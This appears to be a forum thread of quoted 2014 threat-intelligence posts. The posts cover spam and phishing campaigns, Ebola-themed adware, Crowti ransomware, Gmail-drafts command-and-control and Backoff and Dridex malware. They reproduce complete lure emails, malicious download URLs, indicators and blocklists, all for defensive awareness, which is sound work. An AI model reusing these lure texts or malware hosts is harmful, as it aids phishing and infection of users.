Oct 27, 2014 - "... More news of infection outside Africa such as this could further fuel the ever-increasing fear and anxiety for one’s own life and well-being, especially in terms of how one interacts with the outside world. People are trying to be more careful in their dealings than usual, always wanting to be on the know about the latest happenings. This is why web threats banking on perennial hot topics like Ebola could be effective lures against users, especially in the long run... Upon initial visit to the page, users are presented with the following prompt at the top-middle part of the screen:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/ebola-with-prompts-1024x341.jpg
Below is a screenshot of the downloaded file with an overview of its details:
> http://blog.malwarebytes.org/wp-content/uploads/2014/10/ebolafile.png
EbolaEarlyWarningSystem.exe has a low detection rate as of this writing—four vendors detect it out of 53*... Upon execution, it displays a user interface prompting users to install the ONLY Search toolbar with links to its EULA and Privacy Policy pages. Once users click the “Agree” button, they are again presented with other offers to download, such as a program called Block-n-Surf (a supposed tool used to protect children from adult-related content, System Optimizer Pro (a tool that purportedly optimizes the user’s system), oneSOFTperday (a tool that gives users access to free apps), and a remote access tool among others:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/install5.png?w=564
Once programs are installed, the following have been observed from affected systems: All browser default search pages are changed to ONLY Search:
> http://blog.malwarebytes.org/wp-content/uploads/2014/10/onlysearch.png
Once users open a new browser tab, affiliate sites are loaded up (e.g. a site offering insurance):
> http://blog.malwarebytes.org/wp-content/uploads/2014/10/insurance-affiliate.png
Browser windows open to prompt user to install more programs:
> http://blog.malwarebytes.org/wp-content/uploads/2014/10/pckeeper.png
System Optimizer Pro executes:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/sysoppro-autoexec.png?w=555
- Affected machine slows down
- Shortcut files are created on the desktop
During testing, we haven’t seen any installation of the Ebola Early Warning System toolbar or evidence of warning alerts. We implore users not to be easily swayed with software solutions banking on the Ebola scare. They may be more about enticing internet users into downloading programs that may potentially do harm on their systems, instead of helping them be aware of the current situation**..."
* https://www.virustotal.com/en/file/4c7647ff605a9880f875010b5a09e7f1435b002ad4635dff6c4d14f218eb7dd7/analysis/1414142257/

** http://www.cdc.gov/vhf/ebola/

:mad: :fear:

FYI...

Fake 'Order confirmation' from Amazon SPAM - trojan
- http://blog.mxlab.eu/2014/10/28/fake-order-confirmation-order-details-from-amazon-contains-trojan/
Oct 28, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Order Details”. This email is send from the spoofed address “Amazon .co.uk ” and has the following body:

Good evening,
Thank you for your order. We'll let you know once your item(s) have dispatched.You can view the status of your order or make changes to it by visiting Your Orders on Amazon .co.uk.
Order Details
Order R:131216 Placed on October 09, 2014
Order details and invoice in attached file.
Need to make changes to your order? Visit our Help page for more information and video guides.
We hope to see you again soon...

The 532 kB malicious file is not present in a ZIP file but attached directly and has the name order_report_72364872364872364872364872368.exe (numbers may vary). The trojan is known as Trojan.MSIL.BVXGen, BehavesLike.Win32.Dropper.qh or Win32.Trojan.Inject.Auto. At the time of writing, 3 of the 53 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/17de4b7fab716f6c87b5d3c941ecb5f5b01d5e4980cff71c88451acc90b22bb0/analysis/1414490630/

- http://myonlinesecurity.co.uk/amazon-com-alert-order-details-malware/
29 Oct 2014
- https://www.virustotal.com/en/file/6fb9d2d2de05751a90e70a2973a51a1cf38939075c6849b650b5f00b07183532/analysis/1414584579/
___

Phish - spoofed Google Drive
- http://blog.trendmicro.com/trendlabs-security-intelligence/phishers-improve-scheme-with-spoofed-google-drive-site/
Oct 29, 2014 - "Cybercriminals and attackers are leveraging Google Drive site and brand to go under the radar and avoid detection. Just last week, a targeted attack* uses Google Drive as a means into getting information from its victims. This time, phishers are using a modified version of the legitimate Google Drive login page to steal email credentials. This attack can be considered an improved version of attacks seen earlier this year, which asked for multiple email addresses**.
Fake Google Drive Site: Users may receive an email that contains links that lead to the spoofed Google Drive site.
Spammed message containing links to fake site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/fakegdrive1.jpg
The phishing site allows user to log in using different email services, which is highly unusual as Google Drive only uses Google credentials. The site also has a language option that does not work.
Fake Google Drive site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/fakegdrive2.jpg
To trick the user into thinking nothing suspicious is afoot, the phishing site -redirects- the user to a .PDF file from a -legitimate- site about investments. However, this redirection to a site about investments may still raise suspicions as nothing in the email indicates the specific content of the “document” is related to finances.
After logging in, users are redirected to a legitimate site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/fakegdrive3.jpg
... Mobile Users, Also Affected: Based on our investigation, this attack will also work on mobile devices. When users clicked the “Sign in” button, the PDF file download is prompted and the users’ credentials are sent out to the cybercriminals.
Screenshot of PDF prompt download in mobile devices:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/google_drive_fig8.jpg
... Users should exercise caution when opening emails, even those from known contacts. Avoid clicking links that are embedded in emails. Users can also check first by hovering their mouse over the link; doing so can reveal the true URL of the link in the status bar. Users can also check the legitimacy of the site before sharing any personal data, be it login credentials or contact details. They can check if the site address has any discrepancy (misspellings, different domain names) from the original site (e.g., <sitename .com> versus <sitename .org>). They should also check the security of the site before sharing any information... We have notified Google about this phishing page."

* http://blog.trendmicro.com/trendlabs-security-intelligence/targeted-attacks-stealing-information-through-google-drive/

** http://blog.trendmicro.com/trendlabs-security-intelligence/phishers-cast-wider-net-now-asking-for-multiple-emails/
___

Fake ticketmaster SPAM – PDF malware
- http://myonlinesecurity.co.uk/ticketmaster-tickets-sent-fake-pdf-malware/
29 Oct 2014 - "'ticketmaster tickets have been sent' pretending to come from confirmation-noreply@ ticketmaster .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

Thank you for choosing Ticketmaster.
This email is to confirm ticket(s) have been purchased and attached:
Your Delivery Option is: printed
Your Transaction number is: 869064,00410 ...

29 October 2014: tikets224069_order_type_print_order_details.pdf.zip:
Extracts to: tikets109873_order_type_print_order_details.pdf.exe
Current Virus total detections: 7/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/203daa7fed582e06c8fd7bb770e1f8104c625261e0a03e44ab8ab7296bd4ffac/analysis/1414593309/
___

'Virtual Assistant' - PUP download site
- https://blog.malwarebytes.org/online-security/2014/10/pup-download-site-makes-use-of-virtual-assistant/
Oct 29, 2014 - "... suddenly there’s a person talking at you from the bottom right hand corner of the screen about how you should buy product X or make use of service Y? We recently saw a page asking visitors to upgrade their media player, which Malwarebytes Anti-Malware detect as PUP.Optional.SaferInstall (VirusTotal 12/53*). It looks a lot like many similar download sites out there [1], [2], with one curious addition standing over on the right hand side:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/virtual1.jpg
A virtual assistant! She isn’t very interactive, instead launching into a recorded voiceover after a minute or so of the visitor doing nothing on the webpage. She says:
Please upgrade your media player for faster hd playback.
It only takes a minute on broadband and theres no restart required
Just click this button and follow the easy steps onscreen.
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/virtual2.jpg
... I haven’t seen a virtual assistant / automated online assistant / video spokesperson / video web presenter / whatever they’re called this week used to promote a PUP (Potentially Unwanted Program) download before... Who knows what.. advertising will offer up next..."
* https://www.virustotal.com/en/file/cf192f2c0c433b10ef963f199ae759264749c72a100d4b5907d555ec748cf519/analysis/1414085568/
... Behavioural information
TCP connections
66.77.96.162: https://www.virustotal.com/en/ip-address/66.77.96.162/information/
87.248.208.11: https://www.virustotal.com/en/ip-address/87.248.208.11/information/
90.84.55.33: https://www.virustotal.com/en/ip-address/90.84.55.33/information/
63.245.201.112: https://www.virustotal.com/en/ip-address/63.245.201.112/information/

1] http://blog.malwarebytes.org/wp-content/uploads/2014/01/asosvouchers5.jpg

2] http://blog.malwarebytes.org/wp-content/uploads/2013/12/obamapads4.jpg
___

Hacks use Gmail Drafts to update their Malware and Steal Data
- http://www.wired.com/2014/10/hackers-using-gmail-drafts-update-malware-steal-data/
10.29.14 - "... Researchers at the security startup Shape Security say they’ve found a strain of malware on a client’s network that uses that new, furtive form of “command and control” — the communications channel that connects hackers to their malicious software — allowing them to send the programs updates and instructions and retrieve stolen data. Because the commands are hidden in unassuming Gmail drafts that are never even sent, the hidden communications channel is particularly difficult to detect. “What we’re seeing here is command and control that’s using a fully allowed service, and that makes it superstealthy and very hard to identify,” says Wade Williamson, a security researcher at Shape. “It’s stealthily passing messages back and forth without even having to press send. You never see the bullet fired.” Here’s how the attack worked in the case Shape observed: The hacker first set up an anonymous Gmail account, then infected a computer on the target’s network with malware. (Shape declined to name the victim of the attack.) After gaining control of the target machine, the hacker opened their anonymous Gmail account on the victim’s computer in an invisible instance of Internet Explorer — IE allows itself to be run by Windows programs so that they can seamlessly query web pages for information, so the user has no idea a web page is even open on the computer. With the Gmail drafts folder open and hidden, the malware is programmed to use a Python script to retrieve commands and code that the hacker enters into that draft field. The malware responds with its own acknowledgments in Gmail draft form, along with the target data it’s programmed to exfiltrate from the victim’s network. All the communication is encoded to prevent it being spotted by intrusion detection or data-leak prevention. The use of a reputable web service instead of the usual IRC or HTTP protocols that hackers typically use to command their malware also helps keep the hack hidden. Williamson says the new infection is in fact a variant of a remote access trojan (RAT) called Icoscript first found by the German security firm G-Data* in August. At the time, G-Data said that Icoscript had been infecting machines since 2012, and that its use of Yahoo Mail emails to obscure its command and control had helped to keep it from being discovered. The switch to Gmail drafts, says Williamson, could make the malware stealthier still..."
* https://www.virusbtn.com/virusbulletin/archive/2014/08/vb201408-IcoScript
___

Dangers of opening suspicious emails: Crowti ransomware
- http://blogs.technet.com/b/mmpc/archive/2014/10/28/the-dangers-of-opening-suspicious-emails-crowti-ransomware.aspx
28 Oct 2014 - "... MMPC has seen a spike in number of detections for threats in the Win32/Crowti ransomware this month as the result of new malware campaigns. Crowti is a family of ransomware that when encountered will attempt to encrypt the files on your PC, and then ask for payment to unlock them. These threats are being distributed through spam email campaigns and exploits. Crowti impacts -both- enterprise and home users, however, this type of threat can be particularly damaging in enterprise environments. In most cases, ransomware such as Crowti can encrypt files and leave them inaccessible. That’s why it’s important to back up files on a regular basis... We also recommend you increase awareness about the dangers of opening suspicious emails – this includes not opening email attachments or links from untrusted sources. Attackers will usually try to imitate regular business transaction emails such as fax, voice mails, or receipts. If you receive an email that you’re not expecting, it’s best to ignore it. Try to validate the source of the email first -before- clicking on a link or opening the attachment... The graph below shows how Crowti ransomware has impacted our customers during the past month.
Daily encounter data for Win32/Crowti ransomware:
> http://www.microsoft.com/security/portal/blog-images/a/crowti1.png
Computers in the United States have been most affected with 71 percent of total infections, followed by Canada, France and Australia.
Telemetry data for Win32/Crowti by country, 21 September – 21 October 2014:
> http://www.microsoft.com/security/portal/blog-images/a/crowti2.png
Crowti is being distributed via spam campaigns with email attachments designed to entice the receiver to open them. We have seen the following attachment names:
VOICE<random numbers>.scr
IncomingFax<random numbers>.exe
fax<random numbers>.scr/exe
fax-id<random numbers>.exe/scr
info_<random numbers>.pdf.exe
document-<random numbers>.scr/exe
Complaint_IRS_id-<random numbers>.scr/exe
Invoice<random numbers>.scr/exe
The attachment is usually contained within a zip archive. Opening and running this file will launch the malware... Our telemetry and research shows that Win32/Crowti is also distributed via exploits kits such as Nuclear, RIG, and RedKit V2. These kits can deliver different exploits, including those that exploit Java and Flash vulnerabilities... Crowti's primary payload is to encrypt the files on your PC. It usually brands itself with the name CryptoDefense or CryptoWall... we saw a Crowti sample distributed with a valid digital certificate which was issued to Trend... This is not associated with Trend Micro and the certificate has since been revoked. Crowti has used digital certificates to bypass detection systems before - we have previously seen it using a certificate issued to The Nielsen Company... There are a number of security precautions that can help prevent these attacks in both enterprise and consumer machines. As well as being aware of suspicious emails and backing up your files, you should also keep your security products and other applications up-to-date. Attackers are taking advantage of unpatched vulnerabilities in software to compromise your machine. Most of the exploits used by Crowti target vulnerabilities found in browser plugin applications such as Java and Flash. Making a -habit- of regularly updating your software can help reduce the risk of infection... we also recommend running a real-time security product..."

:fear::fear: :mad:

FYI...

Fake Securitas SPAM – PDF malware
- http://myonlinesecurity.co.uk/securitas-mail-report-attached-fake-pdf-malware/
30 Oct 2014 - "'From Securitas Mail Out Report Attached' pretending to come from Alert ARC Reports is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

From Securitas, please do not reply to this e-mail as it is auto generated.
For any problems please e-mail derry.andrews@ securitas .uk.com

30 October 2014: Q100982010_Mail Out Report.zip: Extracts to: Q100771292_Mail Out Report.exe
Current Virus total detections: 1/54* . This 'From Securitas Mail Out Report Attached' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/835a6a272b252576247a6f51bd1fc6e4ac972284435759baa8fd4f926c25bd97/analysis/1414659759/
___

Fake 'Accounts Payable' SPAM - malware .doc attachment
- http://myonlinesecurity.co.uk/reminder-word-doc-malware/
30 Oct 2014 - "An email with a Microsoft word doc attachment saying 'Please see attached statement sent to us' pretending to come from random names with a subject of 'Further Reminder' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The name of the alleged sender matches the name of the 'Senior Accounts Payable Clerk from the Finance Department' in the body of the email... word macro malware*... The email looks like:
Good afternoon,
Please see attached statement sent to us, I have highlighted on this the payments made to you in full and attached a breakdown of each one for you to correctly allocate. Hope this helps.
Thanking you in advance.
Many Thanks & Kind Regards
Vivian Dennis
Senior Accounts Payable Clerk
Finance Department ..

30 October 2014 : CopyHA779333.doc - Current Virus total detections: 0/53**. Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
* http://myonlinesecurity.co.uk/malformed-infected-word-docs-embedded-macro-viruses/

** https://www.virustotal.com/en/file/949d05c3e51abcee43c74c5309a61b18ffa1cf17cb0be06bdab1a4e52cadb8f5/analysis/1414671500/

- http://blog.dynamoo.com/2014/10/further-reminder-spam-has-malicious.html
30 Oct 2014
... Recommended blocklist:
212.59.117.207: https://www.virustotal.com/en/ip-address/212.59.117.207/information/
217.160.228.222: https://www.virustotal.com/en/ip-address/217.160.228.222/information/
91.222.139.45: https://www.virustotal.com/en/ip-address/91.222.139.45/information/
81.7.3.101: https://www.virustotal.com/en/ip-address/81.7.3.101/information/
195.154.126.245: https://www.virustotal.com/en/ip-address/195.154.126.245/information/
___

Fake Job offer SPAM - malware
- http://myonlinesecurity.co.uk/job-service-new-offer-job-malware/
30 Oct 2014 - "'Job service New offer Job' pretending to come from Job service is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/new-offer-job.png

30 October 2014: job.pdf.zip: Extracts to: job.pdf.exe
Current Virus total detections: 3/53*. same malware as today’s version of my new photo malware**. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2723a595350cb632eac5f98a794265105e49e1be181a50437184482b32075b94/analysis/1414662840/

** http://myonlinesecurity.co.uk/new-photo-malware/
___

Malicious Browser Extensions
- http://blog.trendmicro.com/trendlabs-security-intelligence/an-in-depth-look-into-malicious-browser-extensions/
Oct 29, 2014 - "Malicious browser extensions bring about security risks as these often lead to system infection and unwanted spamming on Facebook. Based on our data, these attacks have notably affected users in Brazil. We have previously reported that cybercriminals are putting malicious browsers in the official Chrome Web store. We also came across malware that -bypasses- a Google security feature checks third party extensions... we performed an in-depth analysis of malicious Chrome browser extension and its evasion tactics, after receiving samples in from Facebook. Facebook’s Security team conducts their own malware research and they regularly collaborate with Trend Micro to keep their service safe... Based on our data starting from May 2014 onwards, Trend Micro HouseCall has helped about 1,000,000 users whose computers have been infected by malicious browser extensions. The top affected countries are mostly located in the Latin American region, such as Brazil, Mexico, Colombia, and Peru.
Top affected countries:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/FB-extension-infection.jpg
... We strongly advise users to avoid clicking links from messages, even if they appear to come from your friends. Users can also opt to use Trend Micro HouseCall* to secure their systems from online threats, including those that may leverage or abuse Facebook. Trend Micro and Facebook are working closely together to combat this threat. Below is the SHA1 hash of the malicious file:
4733c4ea00137497daad6d2eca7aea0aaa990b46 "
* http://housecall.trendmicro.com/
___

Popular Science site compromised
- http://community.websense.com/blogs/securitylabs/archive/2014/10/28/official-website-of-popular-science-is-compromised.aspx
28 Oct 2014 - "... injected with a malicious code that -redirects- users to websites serving exploit code, which subsequently drops malicious files on each victim's computer... injected with a malicious iFrame, which automatically redirects the user to the popular RIG Exploit Kit..."

:mad: :fear:

FYI...

Fake Amazon SPAM - malicious DOC attachment
- http://blog.dynamoo.com/2014/10/your-amazoncouk-order-has-dispatched.html
31 Oct 2014 - "This -fake- Amazon email comes with a malicious Word document attached:
From: Amazon.co.uk [auto-shipping@ amazon .co.uk]
Reply-To: "auto-shipping@ amazon .co.uk" [auto-shipping@ amazon .co.uk]
Date: 31 October 2014 09:12
Subject: Your Amazon.co.uk order has dispatched (#203-2083868-0173124)
Dear Customer,
Greetings from Amazon .co.uk,
We are writing to let you know that the following item has been sent using Royal Mail.
For more information about delivery estimates and any open orders, please visit ...
Your order #203-2083868-0173124 (received October 30, 2014) ...

The Word document contains a malicious macro... but is currently undetected at VirusTotal* (the Malwr report doesn't say much...). The macro then downloads http ://ctmail .me/1.exe and executes it. This malicious binary has a detection rate of 4/52**... 84.40.9.34 is Hostway in Belgium, 213.143.97.18 is Wien Energie, Austria. The malware also downloads a DLL as 2.tmp which has a detection rate of 3/54***.
Recommended blocklist:
213.143.97.18
84.40.9.34
ctmail .me "
* https://www.virustotal.com/en/file/30990e856868cf63c8b680aa333d687f38a1efe03c11aea1a290f30c5d6668ac/analysis/1414752406/

** https://www.virustotal.com/en/file/8c79bff0c302a0c1762fc59ab7001001a9293506197579213e087868493b756e/analysis/1414752639/

*** https://www.virustotal.com/en/file/7534ac5bbb9ff975a744c39320e7d372e80007a1896a04533a8a4b92633bf369/analysis/1414754766/

- http://myonlinesecurity.co.uk/amazon-co-uk-order-dispatched-203-2083868-0173124-word-doc-malware/
31 Oct 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Your-Amazon.co_.uk-order-has-dispatched-203-2083868-0173124.png
* https://www.virustotal.com/en/file/3499806174ac4cf3f707e5c25a7b334548f6ac3b9a2267d35772332d33d56238/analysis/1414744958/
___

Fake 'Confirmation' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/site-management-services-central-ltd-remittance-confirmation-word-doc-malware/
31 Oct 2014 - "An email saying 'Please find attached Remittance and BACS confirmation for September and October Invoices' pretending to come from random names, companies and email addresses with a subject of 'Remittance Confirmation [random characters]' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

Good morning,
Please find attached Remittance and BACS confirmation for September and October Invoices
Best Wishes
Lynn Blevins
Accounts Dept Assistant
Site Management Services (Central) Ltd ...

31 October 2014 : CU293705.doc - Current Virus total detections: 0/52*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/5b38d77c33938254fa50ced98a7471dbe4b8ec2aceb1ae2863bb14c812f0f226/analysis/1414747524/
___

Chrome 40 to terminate use of SSL ...
- http://www.theregister.co.uk/2014/10/31/google_puts_down_poodle/
31 Oct 2014 - "... Update 40* will remove SSLv3 and the hard-to-exploit cookie-stealing Padding Oracle on Downgraded Legacy Encryption (POODLE) attack. Cupertino followed -Redmond- in its browser POODLE put-down after a single click FixIt SSLv3 disabler was issued for Internet Explorer** ahead of removal in a few months. Google security engineer Adam Langley wrote in an update that some buggy servers may stop working as a result... -Chrome- 39 will show a yellow flag over the SSL lock icon, the protocol design flaw that allowed hackers to hijack victims' online accounts and which prompted tech companies to dump SSLv3 in upcoming releases such as -Mozilla's- Firefox 34***..."
* https://groups.google.com/a/chromium.org/forum/#!topic/security-dev/Vnhy9aKM_l4

** https://support.microsoft.com/kb/3009008#FixItForMe

*** https://blog.mozilla.org/security/2014/10/14/the-poodle-attack-and-the-end-of-ssl-3-0/

:mad: :fear:

FYI...

Fake invoice SPAM – Word doc malware
- http://myonlinesecurity.co.uk/new-invoice-random-characters-created-word-doc-malware/
3 Nov 2014 - "An email saying 'A new invoice has been created. Please find it attached' pretending to come from TM Group Helpdesk Billing with a subject of 'A new invoice [random characters]' has been created for You' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Dear Client,
A new invoice, WJ7647670C has been created. Please find it attached.
Kind regards, Marcellus Powell
TM Group
Helpdesk Billing

3 November 2014 : PI646028B.doc - Current Virus total detections: 0/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/3c31fec4b4f77ef581151d87313631956c18bbac82a30c389bdb59b3f5b1b31b/analysis/1415010191/

- http://blog.dynamoo.com/2014/11/tm-group-new-invoice-ab1234567c-has.html
3 Nov 2014
... Recommended blocklist:
91.222.139.45
213.140.115.29
149.62.168.210
111.125.170.132
121.78.88.208 "
___

Fake Amazon SPAM - malicious DOC attachment
- http://blog.dynamoo.com/2014/10/your-amazoncouk-order-has-dispatched.html
UPDATE 1: 2014-11-03 - "... different version of the attachment (called ORDER-203-2083868-0173124.doc) which has a VirusTotal detection rate of 0/54* and contains this malicious macro... This downloads a file from http ://hilfecenter-harz .de/1.exe which also has zero detections at VirusTotal... It also downloads a malicious DLL... this as a version of Cridex...
Recommended blocklist 2:
84.40.9.34
37.139.23.200
hilfecenter- harz .de
garfield67 .de
* https://www.virustotal.com/en/file/554695f6d0cd97c2a31fc7f205f3ac3b364f0154d70be41685731f1226e8eeaf/analysis/1415004635/

:mad: :fear:

FYI...

Fake 'New order' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/new-order-7757100-site-word-doc-malware/
4 Nov 2014 - "'New order 7757100' from site is an email saying 'Thank you for ordering' pretending to come from random names at random companies with a subject of 'New order 7757100 from site' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has what appears to be a genuine word doc attached which is -malformed- and contains a macro script virus... DO NOT follow the advice they give to enable macros to see the content. Almost all of these malicious word documents appear to be -blank- when opened...

Screenshots: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/New-order-7757100-from-site.png

- http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/protected-view-macros.png

4 November 2014 : Order561104135.doc - Current Virus total detections: 1/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/16e0fbdbab2fd8d88e8ab1a7ca42e4dc2ea9682ede6a06e6c3a85dae499cec1b/analysis/1415093505/
___

Fake 'Remittance' SPAM – Word doc malware
- http://myonlinesecurity.co.uk/duco-remittance-advice-november-word-doc-malware/
4 Nov 2014 - "An email saying 'Please find attached the details of the payment credited to your account for the sum of 1739.67 GBP' pretending to come from DUCO with a subject of 'Remittance Advice November' [ random characters] with a malicious word document attachment is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

Dear Sir/Madam
Please find attached the details of the payment credited to your account for the sum of 1739.67 GBP
Regards,
Domenic Burton
Accounts Payable Department DUCO

4 November 2014 : De_BW574826C.doc - Current Virus total detections: 0/44*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/792e5c3c2886d6fe7d0b10a25fd78023a7b862a79bd6e461a5e23ecccbc371ef/analysis/1415106043/

- http://blog.dynamoo.com/2014/11/duco-remittance-advice-november-spam.html
4 Nov 2014
- https://www.virustotal.com/en/file/3d6378750d713270bbafc1a18754626d148396253429a6a70c018eadb988120a/analysis/1415110852/
... Behavioural information
TCP connections
91.222.139.45: https://www.virustotal.com/en/ip-address/91.222.139.45/information/
213.140.115.29: https://www.virustotal.com/en/ip-address/213.140.115.29/information/
___

'C-93 Virus Alert' - Phish ...
- http://www.hoax-slayer.com/C93-virus-alert-phishing-scam.shtml
Nov 4, 2014 - "An email claiming to be from Windows Outlook warns that a 'C93 Virus' has been detected in your mailbox and you are therefore -required- to -click- a link to run a Norton anti-virus scan to resolve the issue. The email is -not- from Outlook or Microsoft. It is a phishing scam designed to trick you into giving your Microsoft Account login details to criminals... According to this email, which claims to be from 'Windows Outlook', a 'C93 Virus' has been detected in your mailbox. The message instructs you to click a link to run a Norton anti-virus scan that will 'remove all Trojan and viral bugs' from your account. But, warns the message, if you fail to run the scan, your mailbox will be -deactivated- ... Example:
Dear Outlook Member,
A C93 Virus has been detected in your mailbox, You are required to apply the new Norton AV security anti-virus to scan and to remove all Trojan and viral bugs from your mailbox Account, Failure to apply the scan your mailbox will be De-Activated to avoid our database from being infected.
Click on Optimal Scan and Log in to apply the service.
Thank you ...

If you click the link, you will be taken to a -fake- webpage that is designed to look like a genuine Microsoft account login. When you enter your login details and click the 'Sign In' button, you will be automatically -redirected- to a genuine Microsoft account page... the criminals can collect your login details and use them to hijack your real Microsoft Account. Because the same credentials are used to login to various Microsoft services, they are a valuable commodity for scammers... If you receive one of these -fake- virus warnings, do -not- click any links or open any attachments..."
___

Bitcoin bonanza - or blunders?
- https://www.virusbtn.com/blog/2014/11_04.xml
4 Nov 2014 - "... 'occasionally losing a lot of money through bugs and blunders... 'hard not to feel dizzy and somewhat overwhelmed by the security issues and implications.
> https://www.virusbtn.com/virusbulletin/archive/2014/11/figures/Pontiroli-1.jpg
Malware targeting Bitcoin wallets or using other people's resources to mine for cryptocurrencies are perhaps the least of our worries. What about virus code (or worse, child abuse material) ending up in the blockchain? Or the common flaw of transaction malleability? Or the almost existential threat of the "51% attack"? Cryptocurrencies are here to stay, but they come with their own unique set of problems that we cannot ignore... we're not in Kansas anymore..."
(More detail at the top virusbtn URL.)

- https://www.virusbtn.com/blog/2014/10_31a.xml
31 Oct 2014
___

Facebook: gov't requests for user data rises 24%
- http://www.reuters.com/article/2014/11/04/us-facebook-data-idUSKBN0IO21Z20141104
Nov 4, 2014 - "Facebook Inc said requests by governments for user information rose by about a quarter in the first half of 2014 over the second half of last year. In the first six months of 2014, governments around the world made 34,946 requests for data. During the same time, the amount of content restricted because of local laws increased about 19 percent... Google reported in September a 15 percent sequential increase in the number of requests in the first half of this year, and a 150 percent rise in the last five years, from governments around the world to reveal user information in criminal investigations."

:mad: :fear:

FYI...

Backoff PoS malware - stealthier, more difficult to analyze
- http://net-security.org/malware_news.php?id=2906
Nov 5, 2014 - "... Backoff infections are still on the rise. Fortinet researchers* have recently managed to get their hands on a new Backoff variant that shows that its authors haven't been idle. This version also does not have a version number, but has been given the name Backoff ROM. Compared to the older versions, Backoff ROM disguises itself as as a media player (mplayerc.exe) instead of a Java component in the autorun registry entries... Traffic between the malware and the C&C server is also encrypted, and the way the server responds with new commands for the malware has been simplified... for whatever reason, this new Backoff version does not have keylogging capabilities. But, the researchers believe that this is only a temporary change that will be reversed in newer versions..."
* http://blog.fortinet.com/post/rom-a-new-version-of-the-backoff-pos-malware

- https://www.damballa.com/state-infections-report-q3-2014/
10/24/2014
> https://www.damballa.com/wp-content/uploads/2014/10/soi-q3-2014.jpg

- http://atlas.arbor.net/briefs/index#1351521298
Elevated Severity
6 Nov 2014
Analysis: Since approximately Sep 8, 2014, this new version of the Backoff PoS malware has been classified in the ASERT malware analysis infrastructure, which contains at least three hundred distinct instances of Backoff... Easily compromised systems proliferate, and weak remote access deployments are often the culprit. Among the more difficult to compromise systems, tactics such as spear phishing, vendor compromise, partner attacks featuring lateral movement and other strategies well-known to more dedicated threat actors are bearing fruit for the attackers. Proper isolation, hardening, and monitoring of PoS deployments and associated infrastructure are crucial to reducing risks and detecting attackers that may already be present. PoS is squarely in the sights of many threat actors which means that organizations running PoS and their support infrastructure must realize that they are a target...
Source: http://www.net-security.org/malware_news.php?id=2906
___

Banking Trojan DRIDEX uses Macros for Infection
- http://blog.trendmicro.com/trendlabs-security-intelligence/banking-trojan-dridex-uses-macros-for-infection/
Nov 5, 2013 - "... DRIDEX arrives via spammed messages. The messages, supposedly sent by legitimate companies, talk about matters related to finance. The attachments are often said to be invoices or accounting documents.
Sample spammed message
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/dridex1.png
The attachment is a Word document containing the malicious macro code. Should the user open the document, they might see a blank document. We have seen other attachments stating that the content will not be visible unless the macro feature is enabled — which is disabled by default. Once this feature is enabled, the macro downloads DRIDEX malware:
Malicious attachment instructing users to enable the macro feature:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/dridex2.png
